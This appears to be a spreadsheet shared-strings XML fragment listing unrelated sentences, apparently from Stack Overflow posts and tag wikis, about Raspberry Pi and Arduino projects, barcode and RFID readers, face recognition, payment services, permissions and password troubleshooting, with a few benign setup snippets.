    <t>A merchant account is a type of bank account that allows businesses to accept payments by payment cards, typically debit or credit cards.</t>
  </si>
  <si>
    <t>I am hoping to assign each device to a person and have them scan a bar-code for their username and would like to display which scanner is associated with which person  (Such as Com5 = Bill Com6 = Dave) but just can't find a unique identifier for each virtual com</t>
  </si>
  <si>
    <t>Let me explain deeper, Hashing is a one way "messing" works almost like this:
Assuming password being "1234" and salt "2" the sum of the password digits would be 10
your hash would be 21, so you see that even if you reverse the equation, you can't just recover the original password, what you can make to get this password is making a bruteforce to try to find the password.</t>
  </si>
  <si>
    <t>Because my phone rejoins Wifi about a minute before I actually enter my home, the motion detection is disarmed just before I walk in the door and therefore I don't get an alarm of myself coming in.</t>
  </si>
  <si>
    <t>With a single integration, merchants are able to accept credit cards, debit cards, and PayPal globally, as well as Venmo and Apple Pay in the USA.</t>
  </si>
  <si>
    <t>Apple  framework performs face and face landmark detection on input images and video, barcode recognition, image registration, text detection, and, of course, feature tracking.</t>
  </si>
  <si>
    <t>For questions about unique identifiers, keys, names, etc., see unique or more specific tags such as unique-constraint, unique-index, unique-key, unique-ptr, etc.</t>
  </si>
  <si>
    <t>My connected external drive is mounted automatically to /media/pi/TOURO
I would like to share "Share" directory on this drive for "alma" users (with read+write permissions)
The problem is that when I try to change owner of the "Share" dir nothing happens:
If I try to change permissions of the directory the same happens:
Has anyone faced with this issue?</t>
  </si>
  <si>
    <t>These are mainly barcode scanners, which if I'm correct, are basically just keyboard emulators.</t>
  </si>
  <si>
    <t>The service supports contactless payments using near-field communications, but also incorporates magnetic secure transmission that allows contactless payments to be used on payment terminals that only support magnetic stripe and normal contactless cards.</t>
  </si>
  <si>
    <t>The problem is that whatever I try to keep the key pressed while the serial read byte doesn't change, I get stuck in a single key pressed situation or in an infinite loop of keystrokes sent in a little to no time situation (game I'm currently doing this project for, where the idea came from, expected behaviour, current behaviour...)
I would also like to say that I know I could reprogram the Arduino firmware to be recognized as the other "bridge" chip to get the keyboard library working but I would like to be able to use this board for other projects too and having it just to recompile and upload the sketch I need every time and switch project in the matter of a minute is a must for me that I don't have more than a single board around just bought saving some mum's school budget with cheap gear instead of "Fabriano's" one (known, good and not cheap brand here where I live)...</t>
  </si>
  <si>
    <t>Additionally there was some issues with the getpass3 function and scrambling the password in terminal so for the time being I've switched to raw_input once I get the email send functioning I plan to switch back to the getpass3 and fix it as all it did before was type display the prompt for enter password and then hang at that point.</t>
  </si>
  <si>
    <t>Smartcards are often use as employee ID badges or in contactless credit/debit cards.</t>
  </si>
  <si>
    <t>Here's the connection code:
And here's the password changing code:
All together should work like this: 
User inputs email --&gt; Sent otp --&gt; Put in username (stored in user_name entry in tkinter) --&gt; Enter password sent to their email (stored in user_password entry in tkinter) --&gt; change password
Does anyone know why it won't change the password in AD?</t>
  </si>
  <si>
    <t>After hitting Enter, screen is cleared and when I type something, it appears on the other login screen but hitting Enter just moves the carriage to the beginning of the line.</t>
  </si>
  <si>
    <t>...On a valid card read, I'm getting:
Alarm Disarmed
Door Unlocked
Card Admitted
Alarm Disarmed
Door Unlocked
Card Admitted
Why do you think it's running through twice?</t>
  </si>
  <si>
    <t>The wireless problem can be solved by creating ad-hoc network (sounds interesting but I have not tried this yet) or simply buying a better router, and the encoding problem can be solved with Aaron's solution.</t>
  </si>
  <si>
    <t>If the LED comes on, I suggest you to boot your raspberry with barcode scanner plug in, open terminal and type:
After that, reboot and open a txt file a try to scan a barcode; Pay attention that barcode is recognized by scanner.</t>
  </si>
  <si>
    <t>Face recognition: provides functionality related to face verification, finding similar faces, face grouping, and person identification.</t>
  </si>
  <si>
    <t>I am using siddhi on android and have registered emulator with IOT server, but the issue is that sometimes it works but sometimes it gives an error like this
my guess is that it is happening because each time I launch emulator the credentials change for the phone
It shows me that agent is not connected
but Agent shows that sync was ok
what am I doing wrong?</t>
  </si>
  <si>
    <t>Tag with the specific sort of detection you mean: collision-detection, face-detection, feature-detection, browser-detection, etc, etc.</t>
  </si>
  <si>
    <t>I was planning on connecting the reader to the Pi, but I was wondering if it's possible to unlock PC only after the password is entered and the NFC tag is scanned.</t>
  </si>
  <si>
    <t>I tried to write some Python code on my Raspberry Pi 2, but I faced a problem, the problem is that I'm connected to the pi via SSH, but when I try to execute the code below, the terminal window on my computer freezes for 2 to 3 minutes and then this error appear:
the Python code that causes this problem is:
note that I'm working on the python command line shell and the problem happen just when I execute the last line of the code(pwm.start(5)), please help me and thanks alot</t>
  </si>
  <si>
    <t>I have also tried
Using a cell phone as hotspot with similar result
Unplugging the ethernet cable when attempting to find networks(through the monitor interface)
Changing between password/open network
Both 2.4G and 5G
Changing SSID from uppercase to lowercase
Manually changing the /data/misc/wifi/wpa_supplicant.conf but cannot find any OS files on the SD card.</t>
  </si>
  <si>
    <t>Ideally, I would be able to touch my iPhone to the RFID reader, confirm "apple pay", and have the system detect that it is a valid device.</t>
  </si>
  <si>
    <t>Unless your phone is in card emulation mode, the card-polling example would normally not detect the phone as a card.</t>
  </si>
  <si>
    <t>At last the problem is solved, in barcode scanner there is a mode where automatic enter key pressing is done.Just have to scan the enterkey barcode from the barcoe scanner manual.</t>
  </si>
  <si>
    <t>employee ID badges, electronic passports and ID cards and contactless credit/debit cards).</t>
  </si>
  <si>
    <t>Im trying to make when entering the IP address of the Arduino board, a login screen opens and if the correct information is entered, display the files inside an SD card.</t>
  </si>
  <si>
    <t>First, create a keystore if you have not done that:
Once the keystore is setup, you can change the password using
If you see the following error message when changing the password, it means that the keystore has not been created before, and you have to use keytool -genkey ... to create it:
pi@raspberrypi ~ $ keytool -storepasswd
keytool error: java.lang.Exception: Keystore file does not exist: /home/pi/.keystore</t>
  </si>
  <si>
    <t>When the user scans his/her card on the reader I want it to work like the barcode scanner and input the numeric code in the user_id field and press enter so the page can return the user data.</t>
  </si>
  <si>
    <t>My restrictions are: the files and codes must be read from a thumb drive, there must not be a cap on the number of files, there must not be a cap on the length of the number you can dial, all the outward facing parts of the phone must look like the original phone, it must be a raspberry pi.</t>
  </si>
  <si>
    <t>There are different varieties of this , such as object detection, Identification (like face recognition ), Content-based image retrieval ( like similar images option in google image search) etc.</t>
  </si>
  <si>
    <t>If I enter a wrong password, I get the usual message:
but immediately after that the commandline shows up as if I entered the right one.</t>
  </si>
  <si>
    <t>I can't access you code from here due to proxy problems, however I faced similar problem long time ago when I tried to configure my board as a server.</t>
  </si>
  <si>
    <t>Google Goggles is a mobile application from Google, Inc. that performs optical recognition tasks such as scanning a barcode or translating text via the phone's camera.</t>
  </si>
  <si>
    <t>It's designed for merchants who don't have an Internet Merchant Account for processing credit and debit card payments.</t>
  </si>
  <si>
    <t>EDIT:
I wondered about your motivation for setting such a passphrase, and the only idea I could come up with - correct me if I'm wrong - is that your purpose was to play a neat trick to ensure that a regular user, using a regular keyboard, could never enter the passphrase.</t>
  </si>
  <si>
    <t>I cannot log into mySQL as root, the following error message is displayed:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using
  password: NO)
I tried with suffix -u root (or -uroot) and suffix -p and a supposed password but every time it turns out to be the same error, sometimes with (using password: NO), other times with (using password: YES)
Reading some posts, I tried all the following manipulation :
kill mysqld and then run 
mysqld with --skip-grant-tables
It works and I can log into mysql but any operation proposed to UPDATE the password for user root turns a QUERY OK with 0 rows modified.</t>
  </si>
  <si>
    <t>Waiting for card...
Card found
Card is valid
User identified as :1534
In both cases I swiped the same card at both readers.</t>
  </si>
  <si>
    <t>The raspberry pi will also host a very simple local server and be a communication hub for a barcode scanner (for scanning products) and credit card scanner.</t>
  </si>
  <si>
    <t>I don't know if they would fix the problem, but they are mostly about corrupted files, so they probably fix the problems.</t>
  </si>
  <si>
    <t>The ACR122U NFC Reader is a PC-linked contactless smart card reader/writer developed based on the 13.56 MHz Contactless (RFID) Technology.</t>
  </si>
  <si>
    <t>Card.io is set of SDKs for incorporating credit card scanning into Android or iOS apps via a rear-facing camera.</t>
  </si>
  <si>
    <t>By integrating with BlueSnap, merchants can take payments with credit and debit cards, PayPal, and alternative payment types such as digital wallets.</t>
  </si>
  <si>
    <t>OpenSSL recently changed to SIGILL-free feature detection on some Apple platforms because Apple corrupts things.</t>
  </si>
  <si>
    <t>In fact, I am not using Bluetooth Keyboard, I am implementing a virtual Keyboard in Raspberry Pi.Here, I build a HID profile in Raspberry Pi using Linux Bluetooth stack BlueZ.So my Phone detect as Keyboard and I can send any String like " Hello World " as HID report which will spread in the entire Text box of the phone.Next experiment is to issue an OS interrupt like Screen-Lock to my phone.</t>
  </si>
  <si>
    <t>Barcodes originally were scanned by special optical scanners called barcode readers, scanners and interpretive software are available on devices including desktop printers and smartphones.</t>
  </si>
  <si>
    <t>I had been continuing to try to solve the problem and at one point connected a keyboard and mouse and noticed that they seemed to be recognised (laser came on, Caps Lock toggled, etc.)</t>
  </si>
  <si>
    <t>Face Detection in Google Play services 7.8, includes vision API for optical character recognition, detecting faces, and reading barcodes.</t>
  </si>
  <si>
    <t>It acts as a USB keyboard and with a simple touch on the YubiKey, it automatically generates and enters a unique identity and One-Time Password (OTP).</t>
  </si>
  <si>
    <t>You can check this using:
You need to be sure that:
the path is valid
the image is not corrupted
you have the privileges to access that folder
To actually display the image, you need to use  after the imshow.</t>
  </si>
  <si>
    <t>I am currently making a barcode scanner app using a usb barcode scanner and currently following the guide here 
I tried running it in 'sudo' and fixing the permission but somehow it just doesnt work.</t>
  </si>
  <si>
    <t>import os as os
os.system("apt-get update -y")
os.system("apt-get install ssmtp -y")
os.system("apt-get install mailutils -y")
os.system("apt-get install mpack -y")
os.system("clear")
email = input("Enter your gmail address: ")
password = input("Enter your gmail password: ")
phone = input("Enter the phone number to recieve emails to: ")
file = open("/etc/ssmtp/ssmtp.conf", "w")
file.write("root=postmaster\n")
file.write("hostname=raspberrypi\n")
file.write("AuthUser=" + email + "\n")
file.write("AuthPass=" + password + "\n")
file.write("FromLineOverride=YES\n")
file.write("mailhub=smtp.gmail.com:587\n")
file.write("UseSTARTTLS=YES")
file.close()
os.system("echo Hello Phone!</t>
  </si>
  <si>
    <t>Payment gateways may provide various modes of payment such as by credit card, debit card, online banking or mobile banking for executing the transaction.</t>
  </si>
  <si>
    <t>I am not sure what the specifics are but normally when I have issues like that I change the ownership to www-data:www-data and if necessary for upload folders I change the folder permissions to 0755 and inside files permissions to 0644.</t>
  </si>
  <si>
    <t>When a user swipes their card the door unlocks using the following code:
I'm trying to create a 5 second delay before the door then locks using the following line:
This is the code that I've used to try and execute a 5 second delay but currently it unlocks then immediately locks again which doesn't provide enough time for a person to physically push a door open:
piface.getRelay(PiFaceRelay.K0).open();
Timer autoLockTimer = new Timer(5000, new ActionListener() {
    public void actionPerformed(ActionEvent e) {
        piface.getRelay(PiFaceRelay.K0).close();
    }
});
autoLockTimer.setInitialDelay(5000);
autoLockTimer.setRepeats(false);
autoLockTimer.start();
I imagine I'm just not using the timer correctly.</t>
  </si>
  <si>
    <t>The image below contain the command that change the permission for folder:
I want to change permission folder in Raspberry Pi to  permission it is folder for radio in /var/www.</t>
  </si>
  <si>
    <t>It will get you by for a quick hack, but if that hack changes you can be in for hard to debug trouble.</t>
  </si>
  <si>
    <t>Contactless smartcards are often used for ID documents and contactless payment cards (e.g.</t>
  </si>
  <si>
    <t>I have put together a kiosk consisting of a Raspberry pi 3 running Raspbian and a Hanns.G HT231HPB touch screen monitor to display a web page, because I don't want inadvertent submission I have locked a lot of the links down with Javascript confirm, these work, but the touch point is significantly offset to above the button which makes it difficult for the users.</t>
  </si>
  <si>
    <t>Microblink offers these products:
BlinkID - SDK or WEB API for scanning identity cards passports and driver licenses
BlinkReceipt - SDK for scanning retail receipts and extracting all details on an SKU level
BlinkInput - SDK for scanning predefined text or numbers field-by-field (loyalty cards, TOP UP, VIN, SIM, healthcare cards)
PhotoPay - SDK for scanning standard payment slips (HUB3) or payment invoices field-by-field
PDF417 - SDK or WEB API for scanning barcodes and QR codes
Resources
Microblink Dashboard for developers to generate and manage license and API keys.</t>
  </si>
  <si>
    <t>That is, would an RFID reader be able to retrieve any sort of passive information like a chip's unique ID or something of that nature, by using an RFID reader with something like an Arduino or Raspberry Pi?</t>
  </si>
  <si>
    <t>If the key is present in sd-card, display images from sd-card else display image by downloading from server and cache the same to location of your choice.</t>
  </si>
  <si>
    <t>For example:
var user = getUrlVars()["username"].replace("+", " ");
becomes
var user = decodeURI(getUrlVars()["username"]);
This ensures that usernames containing special characters (like / which would be URL encoded as %2f) are also probably decoded.</t>
  </si>
  <si>
    <t>basically i wanted replicate this project
https://www.hackster.io/peejster/facial-recognition-security-system-c6ca6c
So based on what he said i signed up a Microsoft Cognitive Service and i have have been using the free facial recognition API, and stored the key in the constants folder.</t>
  </si>
  <si>
    <t>I have the problem with a NodeMCU with an ESP8266 and the ArduinoIDE:
I want the to use a softAP and the password for this is supposed to be generated randomly everytime the devices is starting, it is supposed to be 8 digits long, just enough to be displayed on my 8digit 7segment display.</t>
  </si>
  <si>
    <t>The android should be able to receive picture and unlock door by pressing button unlock.</t>
  </si>
  <si>
    <t>I tried the log on the tempSensor module and it shows that there are some issues with the certificate (shown here)
Do you have any idea how to solve the problem?</t>
  </si>
  <si>
    <t>I have a USB barcode scanner and I hope the virtual keyboard can still appear in EditText objects even if the barcode scanner has been connected.</t>
  </si>
  <si>
    <t>MIFARE is the NXP Semiconductors-owned trademark of a series of chips widely used in contactless smart cards and proximity cards.</t>
  </si>
  <si>
    <t>Andriod devices circle around connecting, iPhone comes back with incorrect password - even thought i am typing correct password.</t>
  </si>
  <si>
    <t>If the client enter the correct user and password, then, open the htm file stored in SD card.</t>
  </si>
  <si>
    <t>Here is the Code:
The problems that Im facing now is when I insert the micro SD card... my IP address change to 255.255.255.255 (I cant explain why):
And the other problem is that Login pop-up works, if I have the micro SD card outside.</t>
  </si>
  <si>
    <t>Well-researched subdomains of object detection include face-detection and pedestrian detection.</t>
  </si>
  <si>
    <t>If you want to be really secure you need sort of dongle your sd card with the raspberry pi to make sure that the encryption can only be done if the sd card is entered in that specific pi and you need to encrypt the whole sd card.</t>
  </si>
  <si>
    <t>What I have tried
Signed up for insider @ "Windows Insider"
Trying to follow this tutorial IoT on Raspberry pi 3
But when ever I hit Get Windows 10 IoT Core Insider Preview I always see this page Windows IoT download
I am trying to figuring it out for last couple of hours, why it is always saying to signup as Insider however I am already an insider?</t>
  </si>
  <si>
    <t>After researching I've found out some users with similar issues had trouble with the SAS authentification, although I've never changed it nor touched it in any of the tests run before, so I'm usure about that one.</t>
  </si>
  <si>
    <t>I then tried to limit chmod permissions in /bin to be executable by root users only, which worked perfectly to prevent patron from changing its own modifiers, but it also creates a boot loop on the initial login screen (Entering correct password generates blackscreen and reloads login screen).</t>
  </si>
  <si>
    <t>When you get the following error 'The project need to deployed before you can started
Is due to having the wrong setting in your remote debug options to check this simply right click on your project select properties check the debug options ensure your running debug ARM and have authentication set as Universal Unencrypted see 
Hope this helps anyone facing this issue</t>
  </si>
  <si>
    <t>I am using Raspberry Pi 3 and developing standard LBPH face recognition (not face detection) algorithm to id the face.</t>
  </si>
  <si>
    <t>So I thought the file system was corrupted and wanted to resolve that, problem is I deleted the config file wich seemed to be the problem, maybe that wasn't so smart.</t>
  </si>
  <si>
    <t>I don't know how to fix this problem because there doesn't seem to be a problem, it just looks to me as if safari simply doesn't like the fact that the file is coming from the RaspberryPi so it blocks the scripts.</t>
  </si>
  <si>
    <t>I'm hoping to get the IoT device to read the facility code and badge number off of the proximity card when swiped.</t>
  </si>
  <si>
    <t>Phones have to perform some sort of card emulation to be able to be detected by a reader, as they are not tags.</t>
  </si>
  <si>
    <t>I'm working on some project for myself, this project is about serial communication chat, where "Welcome Screen" starts with asking for your 'UserName', and then it takes you to MainMenu ...
First Problem here that I want the Welcome Screen to wait until the other PC enters his 'UserName' as well, so it receives it as, let's say 'PartnerName'...</t>
  </si>
  <si>
    <t>However I was also monitoring a database which would automatically fire a lock command if the locked state in the DB was true (which it was) and would immediately execute after the door was unlocked by a card swipe.</t>
  </si>
  <si>
    <t>Usually, the term "contactless smartcard" refers to a contactless transponder that adheres to the smartcard communication protocol standardized in ISO/IEC 7816-4 and that has a radio frequency interface according to ISO/IEC 14443.</t>
  </si>
  <si>
    <t>When I try it with just 
I get prompted to enter the raspberry pi password and receive this error:
ssh: Could not resolve hostname c: Name or service not known
Any ideas on how to fix this issue?</t>
  </si>
  <si>
    <t>Smartphones can take on the role of card, however, when they act as a credit card for contactless payments.</t>
  </si>
  <si>
    <t>As you can see from this screenshot (https://github.com/NevadaDonorNetwork/FSK-Prox-Card-Demo/blob/master/FSK%20Prox%20Card%20Demo/Screenshot_2019-04-04_13-49-14.jpg) the IoT device is detecting the card reader.</t>
  </si>
  <si>
    <t>In addition to that, I can connect to databases that have their own username and password instead of the network credentials without any problems, using syntax similar to:
conn=OpenSQLConnection[JDBC["Microsoft SQL Server(jTDS)","SERVERNAME:PORT/DatabaseName"],
"Username"-&gt;"USERNAME","Password"-&gt;"PASSWORD"]
I've also tried inputting my network credentials in the username and password in a variety of ways on the Pi, but I've had no results so far.</t>
  </si>
  <si>
    <t>So i Used The Code Below: 
The Result I Get on Browser is ( Which is What i need): 
enter image description here
ISSUE:
Now The Issue Is Some Times it misses the serial data i send, For Example if i click unlock door 1, It sends data and i click unlock door 2  it does nothn and when i reset it sends data from all 3 but for two to 3 times and then module resets it self  ....</t>
  </si>
  <si>
    <t>Is there a way to enter the username and password to these fields and click the button automaticly, or is there a way to enter these once and somehow save them??</t>
  </si>
  <si>
    <t>for gpio 183 on beagleboard c4
Though I had to change permissions to modify these files 
As I said I am pretty new to the beagleboard and ubuntu but this worked for me so I thought I would share it with you, I hope it is of some help.</t>
  </si>
  <si>
    <t>After reboot RPi works extremely slow (~5 minutes to turn on), ssh (via Putty) works horrible (actually, sometimes it doesn't work at all, just "connection refused") and for some reason MySQL is messed up.</t>
  </si>
  <si>
    <t>I am trying to interface RFID(radio reader identification) reader to my raspberrypi3.but unable to read RFID Tag number on my serial console.I am always getting the RFID number embedded on the card as a result of my code.</t>
  </si>
  <si>
    <t>What my current code is doing is to initialize the SD card in spi mode, wait for the user to press a button to lock the card and another button to unlock it (using CMD42).</t>
  </si>
  <si>
    <t>Each device is preconfigured, so we were thinking of programming each device with a unique identifier that could be used by the customer to find their device and "claim" it from the IoT hub on the cloud, but we would love to hear any other thoughts and suggestions.</t>
  </si>
  <si>
    <t>I got 2 screens, 1 for my main pc trying to ssh into the pie and 1 screen for the pi, both keyboard and mouses are plugged into both pcs so can individually control them.</t>
  </si>
  <si>
    <t>The reason I point this out is blanket permissions changes like sudo chmod -R 755 /var/www/ can solve the issue, but sometimes its better to know where the exact problem is coming from so that you arent as confused as to what really happened.</t>
  </si>
  <si>
    <t>If you devices are remote, then I would go with your original plan, however your friend is correct if the gateway changes this would require something a little more robust.</t>
  </si>
  <si>
    <t>I'm trying to reset the password of my Raspberry Pi 2 B running Raspbian, and I thought I could do this by mounting the sd card on my Ubuntu PC and change the shadow file for the pi user from
to
in order to signify that my user doesn't have a password in shadow, just as it looks in Ubuntu when I remove my account's password with
sudo passwd my_user -d
However it didn't work and now I see I have on my Raspberry pi in /etc/ 2 passwd files and 2 shadow files: my modified files of passwd and shadow and a passwd- and shadow- file that seem to be the file versions, before I changed them.</t>
  </si>
  <si>
    <t>And so will, I presume, be interpreted as the next to last character of your passphrase ( = the passphrase is everything before this 0x00) by your 802.11 stack if correctly implemented, and you're looking for undefined behavior - at best, interoperability problems, at worst, you're taking a bet.</t>
  </si>
  <si>
    <t>After inputting the password (each pushed button shows an asterisk *) the application should show yet another bitmap, which would inform whether the password was correct or not.</t>
  </si>
  <si>
    <t>So you need to define every environment variable that would be required by your program
So you define DISPLAY=:0 to select the default display and you need to set XAUTHORITY=/home/&lt;user&gt;/.Xauthority to prove that you are authorized to connect to the display</t>
  </si>
  <si>
    <t>Getting facebook friends list
Checking facebook friends or not
Messaging Friends
Getting app friends
Invite friends
etc.</t>
  </si>
  <si>
    <t>The other device will be a main hub (Raspberry Pi 3) which will do all of the heavy lifting such as facial recognition, speech recognition and other operations.</t>
  </si>
  <si>
    <t>CARD/RFID TAG present &gt; recognised &gt; servo to 120 + led, buzzer
                present &gt; not recognised &gt; led, buzzer
 IF SWITCH is pressed &gt; servo to 120 + led, buzzer REGARDLESS of the CARD stuff.</t>
  </si>
  <si>
    <t>The "traditional" hashing algorithm used by the original Unix crypt(3) was based on a modified version of the DES block cipher, and only supported passwords of up to 8 characters, with 7 bits per character, and a two-character salt with 6 bits per character.</t>
  </si>
  <si>
    <t>To fix it you need to:
Make passcode() return some value when a button wasn't pressed.</t>
  </si>
  <si>
    <t>After copy the  and /lib folder that includes /firmware and /modules to the SDCard and set the current Image as default, When boot the RaspberryPi shows some troubles related with Network interface and doesn't recognize the USB Keyboard so I can't logging into it.</t>
  </si>
  <si>
    <t>The idea is for one raspberry pi to be used to stream the connected webcam and for another to display the stream, sort of like a surveillance camera.</t>
  </si>
  <si>
    <t>I've successfully mounted the drive using fixed //IP/Folder /Mount/Point while providing interchangable username and password as the NAS has permissions set up which are unique to each user.</t>
  </si>
  <si>
    <t>While trying to solve the problem and at one point connected a keyboard and mouse and noticed that they seemed to be recognised (laser came on, Caps Lock toggled, etc.)</t>
  </si>
  <si>
    <t>Basically right now if I type "U" then enter- the car unlocks, "L" then enter- the car locks, and "T" then enter- the trunk opens.</t>
  </si>
  <si>
    <t>I want to use Smart Watch to do that but I do not know which smart watch provide environment which allows me to implement wireless communication between watch and Raspberry (Raspbian OS) easily.</t>
  </si>
  <si>
    <t>Basically, I want it to 
Recognize face, store the face and request the visitor to enter their detail such as Name, ID number etc in a spreadsheet.</t>
  </si>
  <si>
    <t>The camera is not device 0 (try other numbers);
The camera might not be installed (driver issue) or connected properly to your device;
The camera is not supported by OpenCV.</t>
  </si>
  <si>
    <t>So, after a thorough understanding of my problem and gathering knowledge on linux networking/configuration, I realized the problem lies in firewall configuration of my PC/Linux, it is blocking the access.</t>
  </si>
  <si>
    <t>This tag should cover all that has to do with physical scanners like bed scanners and hand scanners, and software scanning using cameras.</t>
  </si>
  <si>
    <t>All friend_* permissions have been removed
/me/friends returns the user's friends who are also using your app
Friends now has a new permission- user_friends
New endpoints:
/me/taggable_friends: The new Taggable Friends API.</t>
  </si>
  <si>
    <t>Background:
2 Sonoff Wifi relays to switch the lights on in the garage
1 Raspberry Pi running as a security camera in the garage with motion detection
I've got them working independently but what I'd like to do is turn the lights on if the camera detects motion.</t>
  </si>
  <si>
    <t>But the SHA1 fingerprint will change as the server certificate changes, so hard-coding it isn't an option.</t>
  </si>
  <si>
    <t>The Realex Payments API supports multi-currency credit/debit card acceptance, local and alternative payments, fraud management, currency conversion, card tokenisation and recurring billing, it also supports refunds and card storage along with other functionality.</t>
  </si>
  <si>
    <t>It works by using Bluetooth Low Energy Proximity sensing to transmit a Universally unique identifier which when picked up by a compatible app or operating system can be turned into a physical location or trigger a specific action on the device such as a Check-in on social media.</t>
  </si>
  <si>
    <t>I'm pretty sure my Username and Password is correct.</t>
  </si>
  <si>
    <t>I just hit enter with no password and it mounts.</t>
  </si>
  <si>
    <t>The problem is that anyone can take out RPi SD card and take that password/passphrase or id_rsa key itself.</t>
  </si>
  <si>
    <t>Often this means that keystrokes entered will not be displayed on the screen immediately.</t>
  </si>
  <si>
    <t>Payment cards are Visa, MasterCard, JCB, American Express and Diners International branded cards.</t>
  </si>
  <si>
    <t>Linea-Pro is a hardware peripheral product used for scanning barcodes and reading credit card mag stripes for iOS devices.</t>
  </si>
  <si>
    <t>Once I paired by phone with a Bluetooth keyboard which all "keys" (like in windows is Win+L) should be pressed in order to screen-lock my Android and iOS phone.</t>
  </si>
  <si>
    <t>This application will make heavy use of the camera, for example with face recognition.</t>
  </si>
  <si>
    <t>Essentially I want users of the app to be able to login using an RFID card as opposed to inputting their username and pin, but I still have a lot of work to do to get this done.</t>
  </si>
  <si>
    <t>[Y/n]
again, I used not password, just pressed enter
And I can continue Down through setting up new password, disabling remote login, ect....</t>
  </si>
  <si>
    <t>I would like to minimize ammount of data that is written to sd card in order to extend it's durability (I've already applied fixes for preventing sd card damage, like tmpfs for logs and other hacks).</t>
  </si>
  <si>
    <t>What I'm trying to do is have 5 Buttons set up that will transmit a unique integer per button only when the button is held down, otherwise they will send a "0" when the button is released.</t>
  </si>
  <si>
    <t>The only thing I can think that might be happening is some issue with a firewall, but I have no idea how firewalls work so if this has been seen before and it is a firewall issue, more detailed guide would be nice.</t>
  </si>
  <si>
    <t>https://docs.wso2.com/display/IoTS300/Changing+the+Super+Administrator+Password : Changing the password via file configurations.</t>
  </si>
  <si>
    <t>Because of that
 the Wire library is also not suitable for plug and play 
 functionality, unplugging an I2C device will immediately
 lock the hardware (if you want to talk to it) and you 
 need to reset the hardware.</t>
  </si>
  <si>
    <t>I have not created the login script (Yet) since i know how to create it, but my pseudo code looks similar to this...:
Not sure if this is possible, but im trying to make it so that if the user enters a correct password it will start an event, else it will start another event if the password is false.</t>
  </si>
  <si>
    <t>uid stands for one of the following:
user identifier 
unique identifier
References
uid assignment policy
uid/gid synchronization and management
Changing UID of User under Leopard / OSX
Coherence: Class UID
EWS: UID not always the same for orphaned instances of the same meeting
Data providers and the uid property
UID Element
x:Uid directive
UIElement.Uid Property</t>
  </si>
  <si>
    <t>When I am trying to configure the onboard Wi-Fi, the tutorial says to enter the password, but it does not have any place to enter the username for the Wi-Fi network.</t>
  </si>
  <si>
    <t>Payment card details do not need to be entered when making a payment.</t>
  </si>
  <si>
    <t>That said, if you say you changed nothing, and you've tried with different boards, your problem is indeed very strange
So, I'm now wondering if your Arduino library is not corrupted in some way Maybe did you hack something in the code that inverted HIGH and LOW a while ago and forgot about it?</t>
  </si>
  <si>
    <t>(https://websiteforstudents.com/mariadb-installed-without-password-prompts-for-root-on-ubuntu-17-10-18-04-beta/)
For me logging in was as simple as:
Don't forget the 
I really hope there should have been a message stating that Ubuntu no longer used passwords when attempting to run mysql.</t>
  </si>
  <si>
    <t>I have an access control system that retrieves data from the database, the problem is if the RFID is not registered on the database, it gets stuck there and it does not scan for the RFID card anymore.</t>
  </si>
  <si>
    <t>I have inserted to it SD card with Linux image so I could connect to it with putty ssh.</t>
  </si>
  <si>
    <t>The result of months of this happening is that the SD card became corrupt.</t>
  </si>
  <si>
    <t>Text File:
Python Code:
So if I scan the card assigned to user2, it works, but if I scan the card assigned to user1, I get Access Denied.</t>
  </si>
  <si>
    <t>I recently had to reinstall Rasbian on my Raspberry Pi due do something becoming corrupt and apt-get not working.</t>
  </si>
  <si>
    <t>I've only really messed with face detection in opencv, so I don't even know where to begin.</t>
  </si>
  <si>
    <t>I can access the server, folder via browser and can see that image was registered in DB but unfortunately there is no image at that folder.</t>
  </si>
  <si>
    <t>I've searched on how to change permissions to the /var/www/html folder and even though i've changed permissions to 'pi', which is the user that the server is running on (did i say that correctly?</t>
  </si>
  <si>
    <t>I suspect that decoding the image to crop it, then re-encoding it is too much for the SD card to take.</t>
  </si>
  <si>
    <t>Your app simply after press a button send to rpi the correct ssh comand.</t>
  </si>
  <si>
    <t>Next when it asks for the "password:" again type in ubuntu and hit enter.</t>
  </si>
  <si>
    <t>Solved the issue 
I was guessing it's the new antivirus issue...</t>
  </si>
  <si>
    <t>When i connect to the Host using x ip address on Putty i get the terminal to input my User, Lets call it "MyPi" and when prompted to enter the password i get an access Denied issue.</t>
  </si>
  <si>
    <t>I realize that barcode scanners are HID devices and act like a keyboard, so I would like to know if there is a way in Python to treat the scanner different and not have an input() call to receive the scanner's input.</t>
  </si>
  <si>
    <t>I'm working on facial detection program using OpenCV destined to work later in an Embedded Linux platform such as Raspberry PI3, this is how I proceed:
First, on a PC running Ubuntu:
In this machine I installed OpenCV 2.4 with NO virtual environnment.</t>
  </si>
  <si>
    <t>At that time the browser is redirected to a web page which may require authentication and/or payment, or simply display an acceptable use policy and require the user to agree.</t>
  </si>
  <si>
    <t>It supports four types of Data Feeds: Barcode Scanners, RFID Tag Readers, MSR Readers and Serial Data Input.</t>
  </si>
  <si>
    <t>I have bought a raspberry pi zero w and performed the headless setup and used ssh to connect to my pc.But it does not detect the wifi interface and always  gives 'No wireless interface found' when i use the bash command 'ifconfig -a'.I have tried many things like changing the wpa-supplicant file or network interface file but nothing works.Beside that my zero w is also correctly programmed as ' sudo cat /proc/device-tree/model' returns 'Raspberry Pi Zero W Rev 1.1'.The bluetooth is also not working.Can someone help me to solve this problem.Here is the output of 'lsmod' command.I thought it will be helpful the sort out the problem:</t>
  </si>
  <si>
    <t>Integration issue with different LDAPS 
Security consoles related issues
Operations console related issue
Self service console related issue
Assignment of token related issue
2-factor implementation with different vendors
Operating system related issue 
Users may contribute with more issues and there resolution.</t>
  </si>
  <si>
    <t>iBeacons are Bluetooth Low Energy (BLE, also known as Bluetooth Smart) transmitters that notify nearby receivers, such as a smart phone, of their presence for the purposes of proximity sensing.</t>
  </si>
  <si>
    <t>RSBarcodes allows you to read 1D and 2D barcodes using the metadata scanning capabilities introduced with iOS 7 and generate the same set of barcode images for displaying and sharing.</t>
  </si>
  <si>
    <t>iBeacons use Bluetooth Low Energy (BLE, also known as Bluetooth Smart) transmitters that notify nearby receivers, such as a smart phone, of their presence for the purposes of proximity sensing.</t>
  </si>
  <si>
    <t>The Vision framework performs face and face landmark detection, text detection, barcode recognition, image registration, and general feature tracking.</t>
  </si>
  <si>
    <t>Hello geniuses i want to only detect the event generated by a usb device attached to it like barcode scanner.Now want that a barcode scanner is plugged in to a usb port of a raspberry pi.now when it scan then how can my rpi detect that a usb device has generated a event.</t>
  </si>
  <si>
    <t>If the webserver runs as user www-data, the mounted folder must be somehow accessible to that user
